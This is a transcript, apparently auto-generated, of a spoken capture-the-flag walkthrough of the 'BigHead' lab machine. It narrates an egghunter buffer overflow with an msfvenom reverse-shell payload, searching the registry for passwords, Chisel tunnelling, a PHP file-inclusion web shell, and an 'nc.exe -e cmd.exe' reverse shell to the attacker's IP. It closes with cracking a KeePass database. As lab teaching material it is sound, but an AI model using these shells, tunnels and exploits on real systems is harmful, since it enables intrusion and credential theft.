dash o shell.py. Or we'll call this venom.py. And I think I mistyped that. That's an H, not an N. And there we go. Let's just fix that typo. V venom.py. That looks good. Let's cat venom.py, and then we will send this. I think you can do dash V for variable so it's not buff if you don't want that. We can go into exploit, paste, and we'll put a comment that says msf venom dash p windows shell reverse TCP lhost ... And before this, let's put woot because that's what Mona told us to put, and that's the EggHunter, and that is right here, I think. I think 77 is W, 30 is 0, 74 is T. Oh, I thought that was it. Yeah. That's it. But we got the buff. So after that, we need to create the payload. So payload is equal to junk plus jump ESP. And let's put, whoops, this on top. So payload plus jump ESP plus the EggHunter. And we encode that in hex. EggHunter, junk. I think that's good. So let's print the payload to make sure it looks fine. Payload. Python exploit.py. Can't combine string and int. Where are we doing that? Probably right here. We have to actually either do like P32. Do we have that? May have to import a library for that. Yeah, let's just do it manually. So this is going to be F0125062. And this is going to turn into F2125060. Okay, let's see. We got our junk. And then I don't remember 6.6. Let's do \x. Put this all as hex. Let's see. F0, that is jump ESP. So that looks good. And then after 1, 2, 1, 2, 1, 2, we have the EggHunter. So that all looks good. So the final thing to do is we have to send the payload. So the first thing we do is do a spray. So this is where we're going to do for I in range. We'll spray it 5 times. Then we don't have to print it. Oh, we can. Print spraying plus I. And then we'll do request.post URL data is equal to buff. And that should be good. And then after the spray, we want to do print. And we're in Python 2, not Python 3. So it's a space before print. We need attacking. And we will do request.head. Then URL plus slash plus payload. And that should be good. Let's do r equals and then print r dot. Is it text like that? We'll see. Python exploit.py. Are we running? We are not. So let's just start the web server, and we won't bother debugging it if we don't crash. Okay, still can't. Can't combine those two, so we'll just do the lazy thing. And module has no object port on 49. Request URL. URL. Wait, what? That looks fine. URL is http:// our host : our port. Oh, post. Spraying, attacking, going here. We did not crash. So what I'm going to do is let's print payload. And the payload looks fine. So let's set a proxy. So to do a proxy, I think it's proxy HTTP. And then we'll do 127.0.0.1.80.80. And then this request proxies is equal to proxy. Okay, let's make sure our burp is intercepting. Send it. Sending the head request. Click go. And we get 404 not found. So let's just take off a bunch of this junk, because keep in mind, everything after the EIP could be considered part of the character space. So if we send too much in this header, maybe it won't crash. So do that and trim down a request. Click go. We're not getting a response. We have line breaks at the end. If we go to BigHead, our box has crashed. And we get to help protect your computer, data execution prevention has closed BigHead Web Server.exe. So doesn't look like it worked. So the first thing to do is step in and make sure that our exploit went down the intended path. So let's do that. Attach to BigHead. And then let's go into Z:, where we have the jump. Is this it? That's not it. We can just do it again. We'll do Mona jump -r ESP. We want to find where the log message is. Go to here. Press F2 to set a breakpoint. We'll continue. Go back to our thing. Send our payload. I just click go. And we see breakpoint has hit. So let's go find our CPU, maximize the window. And we can see we landed on jump ESP. And if we go to a memory registers and follow this in dump, we start at 6681 CA. And if we go back to our exploit, let's v exploit.py, cdsmb, v exploit.py. The egg hunter starts with 6681 CA. So everything looks good. Let us disable dep because we should have got a shell. Actually, we weren't listening, but because I saw that error message, I know we did not. So let's do netcat lvnp 443, rerun the exploit, and then we have to remove these headers, forward, and did we crash? We did. And we don't ever get a shell. So we can just go look, nothing. So let's disable dep. So let's go into control panel. I think it's system, advanced system settings, performance, data execution, and have dep turned on only for Windows programs, essential Windows programs and services. So down here, it was turn on dep for all program and services except those that are selected. And we could have selected it, but I'd rather just do this and reboot. So let's, can we restart? There it is. Dep disable. And we'll let our box reboot and try it again. So there we are, back in our box. We can go launch the BigHead Web Server. Go back here. Run Python exploit. Our intercept was off, so it didn't actually crash it because we're not removing all that junk out of the header. Probably should just fix the code to not have that, but I'm lazy. So remove this, click forward, go to BigHead. If we look at Task Manager, our CPU usage was at 100%, and that is probably a sign that it's working. If we go back to our box and pray, we do have a reverse shell. So now we have to get it working on the target machine. So let's copy exploit to exploit-local. And we can do MSF Venom. The L host is now going to be our box, which is 10.10.14.3. And we can fix that typo. And then while that goes, cd smb. Oh, it's done. So cat venom. Copy this. I forgot that and single quote, so make sure I don't forget that when I go into exploit. So delete this, paste the new one, and we also have to change our host to be dev.bighead.htb. And now let's run python exploit.py, make sure intercept is on, and make sure we are listening. Run this. We can see spraying is taking a lot longer and shouldn't have taken that long. I realized I forgot to set the port. We're no longer on 80 or 8008, we're on port 80. Run this. We sent the spray, we sent the attack. Go over into a request, and we want to get rid of all this extra junk that the module put in. Click forward, and we will wait probably 5 to 10 minutes. And after waiting some time, we have a shell. It just depends on how loaded the box is, because it has to search through its entire memory until it finds the woot woot tag. But if we do a who am I, we are Nelson, so we can do who am I /all. And we don't have that SE impersonation privilege that I always check for, so we can't just easily privesc. So let's do net users, and let's go back to cherry tree, and let's go into let's do web server and then local users, and copy this. Okay, so we can do, I think it's net local group administrators. See if that works. It does. So we can print this, and we are Nelson, and we want to get to Guilfoyle. So let's do a dir in the NGINX directory and see if we missed anything. So if we go into HTML, dir, we got PhpMyAdmin. Doesn't look like anything. We got teapot. Nothing there. Pied Piper. This is probably the home page, so we don't have to worry about that. So let's go see if we can get the configuration of NGINX. cd conf dir type nginx.conf. And this is everything. So this is what I expected when we were on the GitHub page. So we got some type of load balancer going on here. 8018, 8028, 8038, 8048. So if I had to guess right off the bat, this is probably the BigHead Web Service. So we got listen on 80. If the server name is bighead.htb, go to the Pied Piper company blog. And then if the server is mailer, listen on port 80. This is the email service. We got the code. So this is how you do the reverse proxy. We got BigHead Web Backend, that's dev. Just seeing if we missed anything. Nope, we did not, since there is PhpMyAdmin. So doesn't look like we missed anything. Let's go into program files, do a dir. Let's see, we got 7-zip bash immunity. It's a bit odd for a web server. Let's see, KPPS. What is that? This is KeePass. So dir, we can copy all of this and go back to cherry tree, program files, and let's see, sysinternals, see what's here. This is Process Explorer. So let's go into NGINX. It's NGINX manager, config, and we don't have access. So this is a leap of faith. The next thing is we just query the registry for all keys that have password in it. So to do that, we will run reg query HKLM for HK local machine /find password /t reg sz to search for, I think, null terminated strings, and then /s. And I know it's lame, like not doing a bunch of proper enumeration, but this is a Windows 2008 box and things like PowerShell and .NET are limited, so there's not many good tools to do this, and it's just takes forever to do things manually on these prehistoric boxes. So let's go through every key that has password in it. So let's see. Local machine, CLS ID, logon password reset. That's not interesting. We have KeePass, which we already know is on the box. We have NGINX, password hash, and we have something. So let's check this. Echo-n, paste, wc-c, 58, which is an odd length. And we also have things like 2e, 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 3 2e's there. And 2e is period, so that's ... terminates with 0a, which is a null byte. And this just looks like in the ASCII range. So I'm going to do xxd-p-r, and this is going to reverse the hex. And it says, emergent says try harder. So that looks like a troll. Keep on going. We have password hash again. And this is control set 001, control set 002. So nothing special there. Password hash again. And that's it. So I'm going to search these services and see what all the keys here are. So we're going to do reg query, hkey, local machine. We'll just paste. And I guess we have to paste /NGINX to go into a service. Let's see. Reg query /NGINX. And this dumps the service config for the NGINX service. So I did that because of the password hash. And we're seeing what else it has. We have authenticate. And then we have it as a reg binary string and 480037003300. Notice 00 is following everything. That just means it's like 16-byte encoded, I believe. So we can try the same thing, -p-r, and this looks like something much more reasonable. So if we look at this, it says authenticate, and then we have object name NGINX. So maybe this is the authentication hash for NGINX. But regardless, let's copy this and put it in a web server and call this NGINX config and paste that. And then we will highlight this and put that, whoops, is equal to, where is it? This. Decodes to that. So now we have to find a way to log into NGINX. So let's go back and we can do like a netstat-ato and see if this shows us any ports. And hopefully we didn't hang our terminal, because then we have to get a shell all over again, which is painful. Nope, did not. So let's see, what do we have? We have 80, which is 2112 and 3428. Let's see. I guess we should do a copy. Let's copy a bunch of these and start translating what these services are. I wonder if there's a way to get like process name in netstat instead of just PIDs. So let's do netstat, paste, and let's see. 3428 and 2112 is what we want to find first. So we'll do task list, and then we want to search for 3428. That is NGINX. 3428 is NGINX. And then 2112 is also NGINX. And I don't know what I'm doing here, because that's not really too helpful. 134 we know. 2020, that is a odd port. 1504. We have SSH server. So found out what I'm doing. We want to get into this SSH server. So to do that, let's use Chisel. So we have to go to a directory we can write to, maybe cd /windows /temp, echo test to temp, do a dir, and we can't write here, echo test to temp. Doesn't look like we can. So let's try users public. Let's just go into music, echo test to temp, dir, and we can write in c:users public music. So let's delete the file we wrote, and we will try to copy Chisel. So first thing we have to do is go to opt Chisel, and then we can git pull to pull the latest, and we'll remove Chisel, and we want to build a new one. So let's do go OS is equal to Windows, go arc is equal to, I think 386. And then we'll do go build. Do a ls, we got chisel.exe, and it looks like it is a PE32 executable, which is what we want. So let's copy this to HTTPbox's BigHead SMB. And we also have to build Chisel for us. So we'll just do go build. Then we can do a ls, file on Chisel. This is an ELF64-bit, so that is good. We can copy it. We'll copy it in the same place. And then go into that directory, and we have to start a Chisel server. So we'll do /chisel, server port is 80, and we want to allow reverse connections. So let's go into our box, and we can do xcopy 10.10.14.3 chisel.exe here. Invalid drive specification. Copy 10.10.14.3 chisel.exe. Oh, xcopy 10.10.14.3 share chisel.exe. And it looks like it is copying. Let's see. We do have Nelson logging in. Disconnecting. Unknown level for query path. Was it share? It is share. Chisel.exe. So I think it's copying. It's just taking its merry time. There we go. So now we got Chisel. So we can do chisel.exe client 10.10.14.3 port 80 reverse connection 2020 127.0.0.1. We'll do a 2020. Normally I'd like to do a socks reverse, but to do that, we'd have to set up like 2 different tunnels. I forget what video I go over it, but if you just Google IPsec Chisel, you'll probably find that wherever PowerPoint and explain all that. But setting up the socks proxy is painful. So we have a connection. So let's do netcat localhost 2020. And we can see we get a SSH login prompt. So let's try SSH-P 2020 NGINX at localhost. Accept the public key, and then go into Cherry Tree, and let's grab the password. So let's see, that was in NGINX config and dcodes 2. We can grab this, paste it in, and we get logged in. So let's create a new thing, local users, and we'll do NGINX :that for the password. So now we're in a weird shell. If we do ID, not found, who am I, not found, run as, not found, hit double tab, and we can see the commands we have, which isn't much. So let's try to figure out exactly where we are. If we do CLS, we can clear the screen. So let's see. We got PHPMyAdmin, so let's see if there's any creds here. ls grep config. Let's cat config.inc.php. And we have, let's see, users. So user root, and we got password. So we can go back and we'll put Windows users in config and root pass PHPMyAdmin, and just keeping note of this because it may be useful in the future. So nothing really outside of more interesting in that. There is a anonymous directory. Whoops, ls anonymous incoming in one file. Let's try apps. If we go into apps, we get testlink. Go into testlink, and there's a binary, scripts, and htdocs, and also config. So let's see what's in the config. htaccess.conf. Nothing interesting. So let's go into htdocs. And this looks like something very similar to where we started when we did recon in the very beginning, because I see link2.php. And I think that was the one we had done with Burp. If we go to Firefox, what was it? Dev BigHead.htb. Forget what it was, but it directed us to 127.0.0.1. Code. Yeah. So code.bighead.htb directs us to the 127.0.0.1. So let's make sure we intercept this, and again, edit where we go. And I don't know if I selected Burp there. So go here. Let's make sure the Burp is configured to intercept everything. Forward. And this is where we want to change it to be code.bighead.htb. Click go. And this directs us into login.php. So let's look at login.php to see what this does. We can just cat it. Do we have vim? Vim login.php. We do not. So let's just cat login.php. Go up and see what there is. Packages testlink. config OAuth. Let's see, do we have grep? Let's grep -r for include and see if we have any include statements. Grep -r, cat changelog, holy crap. Try and control-C out of this and I can't. We'll just wait for the changelog to finish. Now let's grep that to test grep's working. For middle, it is. So now we can probably grep for, let's say, system on all PHP files. Doesn't find anything. Let's grep for exec. We do have one hit, but that is in the comments. So we can do shell exec next. Let's see. We can do include. And let's see, where does it get this plugin variable from? So grep that stir.php. And that is equal to all this stuff. So plugin name, let's see what plugin name is equal to. Plugin name is equal to t matches. So it doesn't look too interesting. Let's go to require. Let's do require once. And we have a lot of things. And off the bat, we have link2.php require once to Piper coin auth. So let's grep this. See what this is. Link2.php if set Piper coin auth to a post request, base64 code, and then require once to execute it. So what this is doing is saying, hey, if the post variable Piper ID is set, then set Piper coin auth equal to that variable. And then the session we probably don't need. And then it's doing a require once on Piper coin auth, which is the variable we set. So we specify any file and we should get code execution. So now we have to find a place we can write to. So if we go back here, looks like we lost our shell, but we did write to music. Let's see, can we write in anywhere here? Echo test to temp, permission denied. Let's see. Do we have find dot dash writable? Of course we don't have that command. Let's see. NGINX, who am I? ID. There is a user.txt file, cat user.txt. Reading binary file as text. Strings, user.txt. Echo. Oh, let's, before we clobber it, well, we can't copy it somewhere. Maybe we'll copy it. User.txt to 10.10.14.3 share user.txt. Copy. Do we have CP? CP user.txt 10.10.14.3 share user.txt. So really limited at what we can do, and I don't want to clobber user.txt if I don't have to. So let's see. Temp. Y.temp. Let's see. So let's do echo test to temp. Permission denied. Don't know where I can write, but we know we can write with BigHead. So let's do that again. So let's open a whole new pane, go into SMB, and we can do NC LVNP 443. And I know we're listening on it, but because we established a connection, NCAT forks to the background and no longer listens on the socket, so we can start another connection on 443. despite us listening, if that makes sense. So Python exploit.py, make sure burp is set to intercept because we want to remove some headers. Spraying, and then come on attack. Waiting for the last spray to finish. Come on. Anytime. We could probably kill Chisel now, but if I Control-C out, it'll probably kill my whole Netcat shell. Why is it not intercepting? Redo this. Spraying, spraying, spraying. There we go. Attacking. Let's get rid of all these headers that we don't need. And then for the request. And eventually we should get a shell. So while we're looking, we can see if we can find a... Oh man. I'm not sure you can hear that, but this is going now extremely slow. So I'm just going to wait for the shell to return because poking around the box while this is going is infuriating. So we'll just wait. That was much faster than last time. So now we can go into, let's see if we can find where we are. So pwd apps testlink. So ls/, we are in a directory with xampp. So dir. See, do we have any xampp? We don't. We can go into conf and then type nginx.conf. And we executed this on code.bighead. So let's see where he starts. So proxy pass to 5080, location index, test link. Where are you? So that gets forwarded to 5080. And 5080, did we have that in cherry tree for netstat? Where is 5080? It's not here. So I don't know where exactly that is. So maybe this config is not used. So let's see. cd HTML, Bachmani, Pied Piper, Teapot. It's none of those. PHP. Let's see, do we have like a www root? Let's see, xampp. That sounds good. Permission denied. So we can't get into that directory. But we're assuming that is the directory. So cd users public music. We'll write a file here. So we'll do echo. Please subscribe to test.txt. Okay. So now we'll test link to.php. Send this to repeater. Click go to make sure this is not a 404. We get 200 OK. So let's send this to a post request. And then what was it we had to put in? Let's go back to the SSH. It was require once. And we need Piper coin auth is equal to post Piper coin ID. So set this is equal to, let's see, there's 1, 2, 3. So //// users public music test.txt. Click go and see what happens. Required once. Failed opening. Let's see if we put another // Doesn't look like it's working. Failed to open. And I called it test.txt, correct? I did. So users public music. Users public music test.txt. So that may not be a valid directory we can use. So let's keep thinking what we can do. Let's try changing those to backslashes because we're not on Linux. And that still looks like it's the same error. Let's try C:. Oh, have to change these as well. C: users public music. Okay, let's copy this into our Netcat to make sure it's a valid file. It is. Maybe we can do echo PHPInfo. Do type on that again. Shoot, I didn't direct this to a file. Direct that to test.php. dir. Echo, maybe single quotes. Copy too much. PHPInfo to test.php. And that did not work. Let's just copy a file. That'll be the easiest thing to do. So v test.php, and we can do PHPInfo like that. The reason why I'm doing this is so it actually prints something. I'm not sure what's going to happen if we include a file and it doesn't have PHP code. So xcopy 10.10.14.3 share test.php to this directory. And now we should be able to copy or try test.php. Don't have anything. So let's look at the actual source code to make sure we're not missing anything. So let's go to link2.php. cd htdocs. And it is pipe hypercoin. Let's see. Where is the exploit? It's in a post. Okay. So this is it. Start if is set piper ID, and we don't have piper ID. So we need piper ID. We'll call this, I guess, please subscribe. So now we set piper ID, then piper coin auth is equal to post piper coin ID. Click go. It's taking longer, and it looks like we have the PHPInfo. So we have validated that we got this working. So if we go to a browser, we're still waiting. We can go into this finally, change the request type, put this, click go, and this displays the PHPInfo page. So we have code execution finally. So let's create a better shell. So go back to Netcat, and we can do v. We'll do shell.php, and this will be PHP system, then request ipsec. Okay. And now we want to copy it. So shell.php, and go back to repeater instead of test.php, we do shell.php and add the variable ipsec is equal to who am I. Click go. And we are NT authority /system. So definitely have code execution. Now we just have to get something on the box. But let's do interpreter. That would be the easiest thing. So, or we could keep it going and do netcat 64. Let's do that. Locate NC64. Oh, we need 32-bit netcat. Netcat Windows download. Netcat 111 for Win32. So let's save this. And it should have saved. So let's go into move, downloads, netcat here, unzip it, and then we can move the file. Oh, it put everything here. Awesome. So we have nc.exe. So let's copy nc.exe here. And our command will be nc.exe -e, I think. I wonder if we can just do -h. Get help. We probably have to do c:users public music nc.exe-h. And we don't get anything. So let's do 10.10.14.3, port 443. Let's do nclvmp 443. Make sure we can connect first. We get a connection. So now let's try to send a command prompt. So let's do -e cmd.exe. I think that's it. Click go. And we have a command prompt as ntr30/system. So now we should finally be able to go into the users, go to, I guess, administrator. I was looking for Guilfoyle, but he's not there. Desktop, and don't have anything here. I don't know what herdintools.exe is. Documents. Nelson. Users. Desktop. Type user.txt. And we don't have a flag here. So where is the user flag? Let's check the other user on the box, which was NGINX. CD users. Why do I keep doing that? Desktop, dir, and we have user.text that is 32 characters long, so I'm guessing that is correct. So now we have to find where the heck root.txt is. So let's go to administrator, desktop, and examine these files. So type chest.lnk, and let's see, that's program files. It's loading KeePass. And herdintools.exe, I don't know what that is. If we copy this, so let's do xcopy herdintools.exe to 10.10.14.3, share herdintools.exe. File. It doesn't like this. Darn it. I may have to exit the shell. And do we have RL wrap? Let's do apt install RL wrap. Is this a thing? Yep. So this is going to make our shell a little bit less painful. So I always forget to do this with Netcat. and 0xdf showed me this, but it'll give us the up and down keys to our Netcat shells. So let's do Netcat and put our L wrap before it. Go back into Burp, send this. That should be a shell. Oh, I have a bracket. Click go. And I'm not getting a shell. What the hell? Bad request. I have a bracket here. Where did those brackets come from? Don't have a response. Don't have a shell though. So where did those brackets come from? Link to C:, uses music shell.php, ipsec, uses public netcat. I wonder if I have to wait for like a connection to time out. Cancel. Let's do who am I to make sure connection's working. Looks like we may have crashed BigHead. Let's see. Control Z till we get to a state we know worked. Come on. Somewhere I did who am I. There we go. We know this command worked. Click go, and we don't get anything. So maybe I'm going to have to reboot or revert the box, which will be a pain. Well, no, it won't, because we have everything. I'll just get those files back on it. Click go. Let's see. I think we're going to reboot the box because I should be able to get my shell back with this command. -E 10.10.14.3 port 443. Yeah, something went bad. So, gonna reboot the box and see what happens. So once I rebooted, I got my shell back, and we can see we're doing our L wrap. So if I do dir, I can hit up, down, left, right, and that all works. So that's a bit magic. So trying to think where we left off. We were in users, administrator, desktop, and we were trying to get herdentools.exe. So let's try that one last time. So cp herdentools.exe to 10.10.14.3 /share. And it looks like it is copying it. So maybe we just don't want to put file names. And the downside is when we do this netcat shell and don't fork to a new process, the PHP server will die if we leave this session open. So as long as we're here, we can't do any other request because the PHP isn't forking. So one thing to keep in mind, could be a benefit to using Meterpreter because you'll generally fork off to a new process. There's probably something we can do in the command line of executing it to background it so we don't have this issue, but we'll just pray we don't run into that loop again. We were in SMB and we wanted to get lsgrep-c, but we copied it. Let's see, lsgrep herden, there we go. Strings herdentools.exe. See, we have CA certs. Let's just do md5 sum herdentools.exe and see if this has a different file name. So go into Firefox, turn burp off, virustotal.com, and let's search for this hash. So it's something. And it's calling scan.exe. I'm not actually sure what this is. Could be related to the box. Signers. But let's just try Googling it, see if anyone knows its name. hardentools.exe. Probably this. So harden tools to disable features. So it looks like it was actually a tool they used to harden the OS. So that's what hardentools.exe most likely is. Let's go back to the box and keep exploring this chest.link. So this is pointing to KeePass.exe. So let's do a cd ... Let's do I think it's app data roaming KeePass, and there it is. Type KeePass config.xml. So now we're looking into his KeePass config. And because we had chest.exe, that's why I decided to look at it. So, or not, because chest.link pointed to this file is why we're looking at it. So, go to artifacts, we'll vi KeePass.xml, paste that, set paste. And almost all configuration files for specific users will be in app data. That's just how it is. We do have a file to users administrator desktop root.txt zone identifier, but we don't have a root.txt. So that's not there either. We don't have the chest.kdbx. So I wonder if something got screwed up. So let's see, is there anything else we want? Password true, password's admin.png. So we need this picture file because that's going to be the key file. So let's go back to the box and go dir pictures, and then let's copy admin.png to 10.10.14.3. Share, is it shares or share? Share. After that one issue earlier, I'm really careful about specifying which path it is. So we can copy smb admin.png here. And now we have to find the KeePass database. So if we go into desktop, if we type chest.link, let's see, do we have any KDBX or something? KeePass exe. We can go dir c:\progra1. Does that work? It does. So let's go to kpps to see if that KeePass database is there. We can look at keepass.exe.config to see if this is anything. Type, thought that was it. kpps, copy, paste. Let's see, do we have anything? Nothing there. Let's dir/a. There it is. It's a hidden file. That's stupid. /r will show us the extra data. So now we can type root.txt, paste. How do we get this? There should be a way we can copy this portion of the file out. So let's try xcopy copy root.txt to test.txt, invalid name. Let's see, sysinternals was installed in the box, so maybe they have stream and I just missed it. So that is progo1 sysinternals, and nope, that is literally just Process Explorer. So should be a way to get that stream. Let's see. Let's just download streams and do it that way. Sysinternals, streams, because we don't have PowerShell, do we? Who am I? Oh, we may. So we can probably do PowerShell get content root.txt, and then this. Let's do PowerShell get content. Maybe it's not that data. Cannot find a drive with the file name. PowerShell get content :users administrator desktop root.txt. Okay. So now we want to add the zone identifier. Paste. Data. Let's just Google this. PowerShell get alternate data stream. Reading and writing, PowerShell. So set content, get content. Dash stream. So we'll do get content. So dash path, and then dash stream. And that looks like it worked. So maybe this version of PowerShell is too old. So let's go back to our old thing of just getting the sysinternal stream. Download streams, save, and then copy downloads streams.zip into SMB, unzip streams, and we will xcopy 10.10.14.3 share streams.exe, and we can do streams.exe root.txt, and of course it's a sysinternals tool, so we have to accept the EULA. Okay, and how do we view the stream here? Let's do streams delete -s. Recurse subdirectories. Maybe we can just get it this way. Maybe this way. Zone. Root.txt. Streams. So I paused the video and did some Googling. I think this command will do it. So if we more, and then we direct the file back to us, we should get it. So more root.txt zone identifier. There we go. So we get something. That's cool ASCII art right there. So this is the KeePass config file. So we can direct that to KeePass, not config, maybe, what was this? KeePass.something is its new name. So we can xcopy kp.something to 10.10.14.3, share, and then we'll move smb kp.something to a current directory. So now all we need is the probably KDBX file, unless that's what this is. I wonder if we can file KeePass.something, KeePass database. So this is the KDBX. So move kp.something to kp.kdbx. And then we got admin.php. So do we have KeePass? App search KeePass is in the app repository. It is not. App search kp CLI. Command line for KeePass, so we can do that. apt install kp CLI. Yes. And let's go back into this. We want to go into app data, roaming, KeePass. Oh, I've been misspelling KeePass all this time whenever I had those errors. It's 2 E's. So let's see. Chess.kdbx, we have that. That was this, the last used file. And then he's pointing himself to this, and there is a password. So let's do KeePass to John, and the key file is going to be admin.png, and the database is KeePass.kdbx. And unknown file version. So we did not copy this file correctly, it looks like. Key file, do apt install KeePass to John. Make sure we've got it updated. We do. So we should find a better way, I guess, to extract that KeePass file. Because I'm not sure what it's erroring at. File version 330A0D1 unsupported. Let's see, is this a known issue? Let's see. I don't see it being a known issue, so I'm guessing we just have to find a better way to copy it. So what I'm going to do is we'll try it from the Linux on this box. So if we go back to our shell, go to desktop, dir, where is it? dir/a/r. We'll copy root.txt to c:\xampp. dir c:\, copy root.txt to c:\xampp. That should be a file. Copy root.txt to test.txt. dir/a/r. Type root.txt, copy root.txt. Can't find the file root.txt. That is odd. Let's see what's in program files. Again, progr1. We have bash. So let's try bash.exe. dir, ls. Okay, I am in bash. So let's do cat root.txt zone identifier. Was that it? It was. So let's pipe that to, we'll do test.kdbx, do a ls. We can do we have MD5 sum? Doesn't look like we do. Let's just copy test.kdbx to 10.10.14.3, share, dir, ls. Oh, please say we didn't just hang ourselves again. ls //smb grep test. I think I'm going to have to reboot the box again. So Control-C, go, and yes, I'm going to reboot once again, and hopefully that will be the last time. So let's just get our shell up, try it one last time. Yep, so rebooting. The box has been rebooted, so I can click go and get my shell back. We can go to users, administrator, desktop, and we copied it to test.kdbx, and we can see that file is smaller than kp.something, so doing it out of bash did something different than more. So let's try copy test.kdbx to 10.10.14.3 / share, and we copied that file. So we should be able to copy that out of SMB, test.kdbx, and run John again, KeePass to John, and let's do test.kdbx, and we finally get a hash. So now we can go back to our Kraken and go into, we'll do hashcat. And then we want to go into our hashes directory, because that's how I have this organized. We'll do KeePass.bighead.txt. And we want to go where we have that. Maybe it was a different clip. Whoops. Let's do tmux attach -t htb. And then do Control-Shift insert, and that it was in that clipboard. So we can do /hashcat example hashes, I think, less KeePass 13400, because this looks like our mode. So let's copy this /hashcat -m, and then we want the hashes. So that, and then I did bigheat.text, not bighead. Whoops. rocku.text. And we have an extra file delimiter. So let's remove that. There we go. And see how long this takes. It shouldn't take more than like 5 minutes on your machine. I would not recommend running hashcat in a VM. Do it on your host. It's got a Windows, it's got a Linux. If you don't have GPUs, you can do --force, and wow, that was fast. But you can do --force if you don't have GPUs. So the password is darkness. So we can go out, and let's do apt search KeePass, because I think I typed it last time. I did. So I'm going to do apt install KeePass 2, maybe. We'll try 2 and then 2.x. So I spelled KeePass KEYPASS the last time I did this. I guess while that installs, we can do kpcli and then --kdb. It's going to be artifacts. Let's just go into artifacts. So kpcli --kdb. This is going to be test.kdbx --key is admin. And I thought that would be it. The help has it using equals instead of spaces, so let's do that. kpcli with no command. Type help. We can do. I wonder. That's weird. --pw files. I'm not sure how to use the kpcli. But apt should be done installing any second. There we go. So we can do KeePass 2. And then let's copy this directory. Copy. Open. Let's go to there, and we want test.kdbx, master password, darkness, key file is going to be the same place. And this is admin.png. Click OK. And we finally get it, root.txt. And I'm not going to, you can copy password and paste it. Don't want to do that and show the root.txt, but there it is. That is the box, and this was more painful than I expected, so I'm not going to be doing the fuzzing thing for the binary. I'm sorry, but I'll try to put out a specific video on fuzzing relatively soon. So take care, guys, and I will see you all next week.